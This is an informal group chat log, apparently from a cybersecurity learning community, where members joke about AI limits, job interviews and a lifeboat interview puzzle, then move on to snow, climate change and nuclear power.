not with an AGI, it would be able to figure out everything
a flying car is a helicopter
what
Gishhhhhhgallop š
How would these stupid people control AGI that would be several times smarter than humans?
lol we are nowhere near that point
They do not even know what VPN is
I have some experience with AW159's and it's not as fun as the idea of driving the delorean time machine
technically neither does AI, it can just regurgitate info
AI doesn't even know how to multiply
it's just trying to give us results it "thinks" look correct
yet
how would anyone at this point
Well we shall see but that would require something beyond a LLM
but combine Worm with AI and you have self multiplying AI
yipee
I remember in an interview I couldn't explain the technical explanation of a VPN, despite knowing exactly what it is, having set them up, and using them all the time lol… proof that nerves can affect how you think
LLMs can't do math because they were never designed to do so
Just hope that doesn't happen in my interview next week
honestly same
just say tunnel a bunch of times and call it a day 
That's me on every single interview for job. I know this stuff normally and when working even in stress too. But when I am at interview my brain forgets everything
I'm glad you all agree with me lol, fucking hate interviews
Get the shakes sometimes too
But yep I maintain IPSec and SSL VPN stuff at work, and more for personal. I do think I'd be able to answer these questions on the spot as I've had to with third parties before
the only thing worse than working is getting a job
I do understand the anxiety though
I think it's the questions you weren't expecting to be asked that get you… you spend so much time preparing on the questions you want to get asked
what about those weird as fuck questions they sometimes ask
Then you just be honest and answered informed guesses based on the knowledge you already have, whilst stating as such
I hate current job market. Jobs are scarce, only for seniors. Requirements are insane, salaries are meh, remote work almost dead, companies fire people (me included).
WhAts yOur bIggEst wEakNess
you know your character well enough 🤷
I'm too dedicated to my work, and it seeps into my thoughts in my personal life
only half true lol
I don't mind interviews.
For me that's pretty spot on
i interview surprisingly well
Had enough of them with THM.
Hearing this question
just gotta make em laugh a bit, bring down the formality a little level
That's how I finally met Ashu
Mhmm some soft skills can work wonders taking the tension down
ive heard some companies are doing pre recorded interviews
I have to give a 5 minute presentation on why they should hire me
those must be hell
I changed my mind. My biggest weakness is lack of humor
bless you
thats dumb
Make a couple inappropriate jokes right off that bat so the only way it can go is up ⬆️
good luck
Yeah when you said presentation, I thought surely you don't mean… [what you literally just stated]
Sadly, the timing was wrong and I had to turn down the job offer from TryHackMe.
THEY should give a five minute presentation on why YOU should work for them
This is easy
Yep and I don't even have SIEM experience so I created a PowerPoint presentation with a slide that just reads "Skills can be taught. Being a proactive thinker and positive mindset is something you either are or aren't"
smart
Obviously there's more slides
To be fair even if it's a pain, you can get SIEM experience at home, not to mention literal rooms for such on THM
I'd like to think they didn't invite me for the fun of it knowing I don't have that exp
nah it's moved into job stuff
I had a full exam on LogRhythm last year.
nah we talking interviews
I was going to install Wazuh this weekend but I've had a sickness bug lol, that boat has kinda sailed now
That being said, I should disengage so I donāt spend all day here. Been a fun three hours tho lol!
I really hate coding parts of interview. My mind always goes empty on interview and the time they give is never enough. Few days ago I had 20 minutes to write a script in python. 20 minutes ended and they said to me that it looks like I wont make it as interview ends in 4 minutes and we finished it. After the interview I did finish that code in 2 minutes. Of course they did reply to me that they need someone more experienced. I feel like crap to this day
5 minutes of talking about yourself and having 4 others maintain eye contact the entire time I don't personally consider to be easy
Speak slowly during interviews, gets you higher chances of sticking in the interviewer's mind
I usually mimic the speed of the interviewer, creates a sense of similarity and trust
not too slow
Oh god, creepy if over done
That wasn't a joke
Mirroring is creepy
If done intentionally
eye contact the whole time?
why?
sorry can't talk rn watching ben 10!!
No eyelids
imho maintaining your own personality and vibe is critical in an interview, don't be disingenuous
ahh
do you answer the "where do you see yourself in 5 years" question honestly? i always thought that question is a bit too private, like why would i tell you my life plans
nope i dont
Changing the pace of your presentation doesn't necessarily mean speak at the exact pace as the interviewer lol
I couldn't answer that honestly, I don't know where I'm headed
But they may be overwhelmed if you're talking at 100 words per minute
Become the interviewer, mimic the way they talk and look around the room, how they sit, the way they are talking, can't stop there
"Mimic the interviewer" your words cowboy
This is what I'm imagining
no
nah not at all
and whats the right answer to this question anyway? "ill pledge my whole life to your company"
Become them
or like a primal challenge for "who blinks first" lol
Yeah, if they're pushing through questions, give them a speedy response, etc. my words are open to interpretation
I'm talking about them
me if my team ever makes me turn my camera on
Start asking them questions
"So... John. Where do you see yourself in 5 years?
Are you confident in that answer?"
@wind lake I think you have misunderstood lol
Work from home vibes be like, nope I don't have a webcam, never showing my face. Win
Alright time to finish my replay of Final Fantasy IX. I'll be around, but I'm on Disc 4 eager to finish
You can keep your webcam off if you're having technical issues or your network doesn't support it.
Me: funny you should say actually…
ave fun
The plot was thickening but my imagination ran dry
William Shakespeare 1564-1616
"You are a captain of a ship, it's sinking. There are 21 crew members and only 20 spots on the life raft, what do you do?"
I leave no bodies behind
Wrong
Are there children and women?
Unless you have 20 bullets?
I need 1 raft
You convince your crew the boat is salvageable but only with their help. Once on the ship. You take the life raft and sail into the sunset
I'm very tool efficient
Maybe it is salvageable?
Already eaten from being lost at sea for the last 3 months
you house the 20 crew on the raft (already an unsustainable number for a raft) and swim along holding onto the back keel of the raft
They can't leave, they know who did it
You're bringing me memories of the time I was in the DRU
you become the engine
lol indeed
English
I would answer that everyone enters the raft including me. Rafts are designed to sustain bigger mass and capacity by design in the first place so I would just squeeze there.
there's never been a raft that holds 20 tho so, it's presumably already above capacity
Wrong
Life rafts are pretty robust these days
that's already against regulations
To be fair, in what world would you be given an elephant that you are not allowed to sell or abandon and, if so, what would you do with it?
The RN survival raft I think holds up to 30
You'd stick it into the refrigerator of course
This doesn't bring up a good result
Eat it and build an ace ventura spy animal suit from its skin
For osint
Shrimp
Say it to people on titanic
No even then they had far more than one raft, they just didn't have enough
which led to our current international regulations
yes well thankfully we're no longer in 1912
You have to convince them there is only one
Today it's international regulations that your boat carry more life rafts than required to safely evacuate everyone, with a couple to spare
fun fact. Scientists did analyze the titanic story and apparently the dude could survive if he also did get on with the girl on that piece of wood or whatever it was. They calculated it would fit them both and not sink.
Majority of people wouldn't survive in the sea anyway, due to not being able to control their body in the water
Good luck both climbing on
Oh it was a 24 man life raft
Iceberg is there cus of global warming
I know you say that for the lols but wow that's so dumb I'm having a hard time even thinking of a good response even in jest
Not as relaxing when it comes time to shovel/plow
Can you ship me the snow
SHUT UP
lol we have more than enough here, come take some from Michigan
snow's only a vibe for a first couple of hours/ a day
Let me enjoy the moment
Preferably in cloud form
It ain't reaching 15 cm
first half hour its fun
....
next 5 hours is scary
be honest, you have never seen a meter of snow in your life
bro is from siberia
Yep, I doubt I have seen 40cm for snow
Serbia would do, but Michigan used to get that same kind of snow back in the early 1900s and sure doesn't anymore
I have! I've seen 2
Lake effect on the west coast does
Heck it's changed even since I was a kid, we used to get tons, now we're lucky if it snows before January
I mean do you want more snow
Lucky?
no but it's also a bad sign
As in more per snowfall, not more snowfalls
Times a changin
lets all be honest, snow was fun when we were kids and had no responsibilities
so no it's not an improvement when it spells our global impending doom in very visible form
Snow is still fun
dunno, im not having fun in 7 am shoveling it from my car lmao
Both have dramatically decreased since the 90s, it's been wild
Quality is a lil better
Put a towel on your windshield the night before
Oh you mean contamination? Sure but that's on track to get worse too lol
Less of this
🇨🇦 The snow is over my head ^^; Anyone got a snorkel?
Not sure if you've been reading the news but no we're trending to more of that
Where are my nuclear power plants!
Alabama and Georgia I believe. Also N.C.
And I've got two up here near me in Canada.
Project is being built in Wyoming too
but no nuclear power and clean energy is scary and woke. We need to aggressively pump CO2 into the atmosphere to combat the woke
Don't you know, Carbon's good for the atmosphere, you need to put carbon in the atmosphere to feed the plants!
This just took a turn
It's just depressing when we did actually work to fix the hole in the Ozone layer internationally but nah politics prevent us from fixing our current woes
i thought that global warming is a fad
What is happening to the US rn
like 2010 fad
To be fair a lot of places have the opposite fear of Nuclear. There's a very big push by existing powers to prevent nuclear from becoming the primary source of energy in the world. Probably the most egregious example is Germany.
climate change is a fact we already see in motion
@copper stone yo whats up
Well each country has their own reasons why they either pushed Nuclear away or adopted it wholeheartedly like France
Nuclear is orders of magnitude more safe and sustainable
China is pretty big
Yeah but that doesn't stop crazy propaganda from being told about it.